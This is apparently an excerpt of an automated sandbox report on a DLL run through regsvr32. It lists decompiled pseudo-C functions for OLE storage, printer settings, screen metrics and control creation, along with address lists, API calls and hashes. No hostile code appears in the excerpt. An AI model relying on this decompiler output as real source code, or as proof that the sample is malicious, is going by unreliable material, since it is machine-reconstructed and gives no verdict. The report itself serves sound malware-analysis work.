                                                                                                            0x1001637d
                                                                                                            0x10016387
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016389
                                                                                                            0x10016395
                                                                                                            0x1001639a
                                                                                                            0x1001639d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001639d
                                                                                                            0x1001633d
                                                                                                            0x10016344
                                                                                                            0x10016347
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10016318
                                                                                                              • Part of subcall function 100149D9: SysStringLen.OLEAUT32(?), ref: 100149E1
                                                                                                              • Part of subcall function 100149D9: CoGetClassObject.OLE32(?,?,00000000,1003B22C,?), ref: 100149FF
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 100164A2
                                                                                                            • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 100164C3
                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10016510
                                                                                                            • GlobalLock.KERNEL32 ref: 1001651E
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 10016536
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10016559
                                                                                                            • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10016575
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 317715441-0
                                                                                                            • Opcode ID: 60c2ff367ba58e433878bfe60cdb3a31176345bcc59e7f0f273dcfb4529f5694
                                                                                                            • Instruction ID: 65bcce977c73c7d4b95501f4a81464407c87b4e582750ec1064cf11d2baf797c
                                                                                                            • Opcode Fuzzy Hash: 60c2ff367ba58e433878bfe60cdb3a31176345bcc59e7f0f273dcfb4529f5694
                                                                                                            • Instruction Fuzzy Hash: 20C108B090065ADFDB00DFA4CC889AEB7BAFF48344F504969F916EB251C771DA91CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10005BC3 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E10005BC3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E100110BD(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E100110BD( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                                                            0x10005bc6
                                                                                                            0x10005bc8
                                                                                                            0x10005bca
                                                                                                            0x10005bd2
                                                                                                            0x10005bec
                                                                                                            0x10005bf4
                                                                                                            0x10005bfe
                                                                                                            0x10005c05
                                                                                                            0x10005c07
                                                                                                            0x10005c0c
                                                                                                            0x10005c0f
                                                                                                            0x10005c0f
                                                                                                            0x10005c26
                                                                                                            0x10005c2d
                                                                                                            0x10005c45
                                                                                                            0x10005c4a
                                                                                                            0x10005c4f
                                                                                                            0x10005c4f
                                                                                                            0x10005c55
                                                                                                            0x10005c55
                                                                                                            0x10005c05
                                                                                                            0x10005c5a
                                                                                                            0x10005c5e

                                                                                                            APIs
                                                                                                            • GlobalLock.KERNEL32 ref: 10005BE0
                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 10005BEC
                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10005BFE
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10005C1E
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10005C26
                                                                                                            • GlobalLock.KERNEL32 ref: 10005C30
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10005C3D
                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10005C55
                                                                                                              • Part of subcall function 100110BD: GlobalFlags.KERNEL32(?), ref: 100110C8
                                                                                                              • Part of subcall function 100110BD: GlobalUnlock.KERNEL32(?,?,00000000,10005C4F,?,00000000,?,?,00000000,00000000,00000002), ref: 100110DA
                                                                                                              • Part of subcall function 100110BD: GlobalFree.KERNEL32 ref: 100110E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 168474834-0
                                                                                                            • Opcode ID: ebc32e4390c48c151e0b1777109bbc4563f4b747fd47ac077490b5256f26b009
                                                                                                            • Instruction ID: 834996e4caf1481c9af349bd82c863b941331106e3d5840b272905be7d33e105
                                                                                                            • Opcode Fuzzy Hash: ebc32e4390c48c151e0b1777109bbc4563f4b747fd47ac077490b5256f26b009
                                                                                                            • Instruction Fuzzy Hash: D3114875500A04BEEB129BA6CD89CAF7AEDEB89781B104519FA01D9122DA32E981D760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010DF8 Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10010DF8(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x10048618 = GetSystemMetrics(2) + 1;
				 *0x1004861c = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}





                                                                                                            0x10010e03
                                                                                                            0x10010e09
                                                                                                            0x10010e10
                                                                                                            0x10010e18
                                                                                                            0x10010e22
                                                                                                            0x10010e33
                                                                                                            0x10010e3d
                                                                                                            0x10010e45
                                                                                                            0x10010e51

                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32 ref: 10010E05
                                                                                                            • GetSystemMetrics.USER32 ref: 10010E0C
                                                                                                            • GetSystemMetrics.USER32 ref: 10010E13
                                                                                                            • GetSystemMetrics.USER32 ref: 10010E1D
                                                                                                            • GetDC.USER32(00000000), ref: 10010E27
                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 10010E38
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10010E40
                                                                                                            • ReleaseDC.USER32 ref: 10010E48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem$CapsDevice$Release
                                                                                                            • String ID:
                                                                                                            • API String ID: 1151147025-0
                                                                                                            • Opcode ID: 802b906a014bb1a100fa31fb907cbbb50ae0ae566f16ced4c7029288865728b5
                                                                                                            • Instruction ID: e4bb4a9781883fca1ffd26e7a91d1cf17580d25377b1e53741b6ed809414a6cf
                                                                                                            • Opcode Fuzzy Hash: 802b906a014bb1a100fa31fb907cbbb50ae0ae566f16ced4c7029288865728b5
                                                                                                            • Instruction Fuzzy Hash: 8DF03671A40714AEF7206F718C8EF2B7BB4EB86B11F01891AE6418F1D1D6B599018F94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000E09F Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E1000E09F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x10045580; // 0x8f64cb61
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E1001FBC4(E100338B7, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E1000424F(_t246 + 0x28, E1001044F());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E10004D4A(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E1001587F(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E100054DB(_t246 + 0x28, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E1001B444(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E10013723(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E10013CC0( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E10014EA9( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E1000DFFE(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E1001B7A6(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
					E10001260( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E1001FBB5(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

































                                                                                                            0x1000e0a3
                                                                                                            0x1000e0a7
                                                                                                            0x1000e0ae
                                                                                                            0x1000e0b1
                                                                                                            0x1000e0b8
                                                                                                            0x1000e0c4
                                                                                                            0x1000e0c7
                                                                                                            0x1000e0ca
                                                                                                            0x1000e0d0
                                                                                                            0x1000e0d6
                                                                                                            0x1000e0d9
                                                                                                            0x1000e0dc
                                                                                                            0x1000e0df
                                                                                                            0x1000e0e7
                                                                                                            0x1000e0ed
                                                                                                            0x1000e0f4
                                                                                                            0x1000e0fe
                                                                                                            0x1000e106
                                                                                                            0x1000e10e
                                                                                                            0x1000e111
                                                                                                            0x1000e115
                                                                                                            0x1000e119
                                                                                                            0x1000e11c
                                                                                                            0x1000e11c
                                                                                                            0x1000e11f
                                                                                                            0x1000e127
                                                                                                            0x1000e131
                                                                                                            0x1000e140
                                                                                                            0x1000e143
                                                                                                            0x1000e146
                                                                                                            0x1000e149
                                                                                                            0x1000e14f
                                                                                                            0x1000e157
                                                                                                            0x1000e159
                                                                                                            0x1000e15b
                                                                                                            0x1000e15f
                                                                                                            0x1000e164
                                                                                                            0x1000e168
                                                                                                            0x1000e16e
                                                                                                            0x1000e170
                                                                                                            0x1000e172
                                                                                                            0x1000e175
                                                                                                            0x1000e175
                                                                                                            0x1000e164
                                                                                                            0x1000e178
                                                                                                            0x1000e185
                                                                                                            0x1000e192
                                                                                                            0x1000e195
                                                                                                            0x1000e198
                                                                                                            0x1000e19b
                                                                                                            0x1000e19e
                                                                                                            0x1000e1ac
                                                                                                            0x1000e1ae
                                                                                                            0x1000e1ae
                                                                                                            0x1000e1b1
                                                                                                            0x1000e1b6
                                                                                                            0x1000e1b9
                                                                                                            0x1000e1bc
                                                                                                            0x1000e242
                                                                                                            0x1000e242
                                                                                                            0x1000e245
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000e1c2
                                                                                                            0x1000e1c2
                                                                                                            0x1000e1c2
                                                                                                            0x1000e1c4
                                                                                                            0x1000e1c8
                                                                                                            0x1000e1cb
                                                                                                            0x1000e1cf
                                                                                                            0x1000e1d5
                                                                                                            0x1000e1d8
                                                                                                            0x1000e20f
                                                                                                            0x1000e215
                                                                                                            0x1000e218
                                                                                                            0x1000e21a
                                                                                                            0x1000e21e
                                                                                                            0x1000e230
                                                                                                            0x1000e230
                                                                                                            0x1000e220
                                                                                                            0x1000e229
                                                                                                            0x1000e229
                                                                                                            0x1000e232
                                                                                                            0x1000e236
                                                                                                            0x1000e1da
                                                                                                            0x1000e1dc
                                                                                                            0x1000e1df
                                                                                                            0x1000e1e4
                                                                                                            0x1000e1eb
                                                                                                            0x1000e1ee
                                                                                                            0x1000e1f6
                                                                                                            0x1000e1fb
                                                                                                            0x1000e1fe
                                                                                                            0x1000e201
                                                                                                            0x1000e208
                                                                                                            0x1000e208
                                                                                                            0x1000e239
                                                                                                            0x1000e23f
                                                                                                            0x00000000
                                                                                                            0x1000e24c
                                                                                                            0x1000e24c
                                                                                                            0x1000e24c
                                                                                                            0x1000e24f
                                                                                                            0x1000e256
                                                                                                            0x1000e257
                                                                                                            0x1000e258
                                                                                                            0x1000e262
                                                                                                            0x1000e25a
                                                                                                            0x1000e25a
                                                                                                            0x1000e25a
                                                                                                            0x1000e268
                                                                                                            0x1000e26a
                                                                                                            0x1000e26b
                                                                                                            0x1000e271
                                                                                                            0x1000e272
                                                                                                            0x1000e275
                                                                                                            0x1000e289
                                                                                                            0x1000e28d
                                                                                                            0x1000e290
                                                                                                            0x1000e292
                                                                                                            0x1000e294
                                                                                                            0x1000e297
                                                                                                            0x1000e2a0
                                                                                                            0x1000e2a9
                                                                                                            0x1000e2e8
                                                                                                            0x1000e2fc
                                                                                                            0x1000e308
                                                                                                            0x1000e31b
                                                                                                            0x1000e327
                                                                                                            0x1000e334
                                                                                                            0x1000e340
                                                                                                            0x1000e340
                                                                                                            0x1000e2a9
                                                                                                            0x1000e349
                                                                                                            0x1000e34e
                                                                                                            0x1000e34e
                                                                                                            0x1000e354
                                                                                                            0x1000e359
                                                                                                            0x1000e3a1
                                                                                                            0x1000e35b
                                                                                                            0x1000e363
                                                                                                            0x1000e365
                                                                                                            0x1000e365
                                                                                                            0x1000e369
                                                                                                            0x1000e36d
                                                                                                            0x1000e378
                                                                                                            0x1000e382
                                                                                                            0x1000e38a
                                                                                                            0x1000e38b
                                                                                                            0x1000e38c
                                                                                                            0x1000e39b
                                                                                                            0x1000e39b

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 1000E0B8
                                                                                                            • MapDialogRect.USER32(?,00000000), ref: 1000E149
                                                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 1000E168
                                                                                                            • CLSIDFromString.OLE32(?,?,00000000), ref: 1000E25A
                                                                                                              • Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64
                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000), ref: 1000E262
                                                                                                            • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 1000E2FC
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000E34E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2841959276-0
                                                                                                            • Opcode ID: 9d34684e24badfdf3165c200de488e3f2ad464638950e21b7713cad24ab37ac0
                                                                                                            • Instruction ID: a3f1bd5bd1abf24c4919bb55c1ab413f5f44746dc04b4daccf7064a6dc2a22e9
                                                                                                            • Opcode Fuzzy Hash: 9d34684e24badfdf3165c200de488e3f2ad464638950e21b7713cad24ab37ac0
                                                                                                            • Instruction Fuzzy Hash: EFB1F3B5900259AFEB04DFA8C984AED7BF4FF08344F05812AFC19A7251E774E994CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001A49E Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 42%
                                                                                                            			E1001A49E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t103;
				intOrPtr _t120;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = __edx;
				_push(0x6c);
				E1001FBC4(E100346AE, __ebx, __edi, __esi);
				_t122 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t123 - 0x14) = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L18:
					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
					return E1001FC9C(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t108 =  *(_t123 - 0x10) * 0x28;
					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
					if(_t76 == 0) {
						goto L17;
					}
					_t78 =  *((intOrPtr*)(_t76 + 4));
					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
					if(_t78 == 0) {
						goto L17;
					}
					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
					do {
						_t120 =  *((intOrPtr*)(E1000911A(_t123 - 0x20)));
						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
						E10020F40(_t120, _t123 - 0x78, 0, 0x20);
						_t124 = _t124 + 0xc;
						E1001BDF4(_t123 - 0x48);
						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
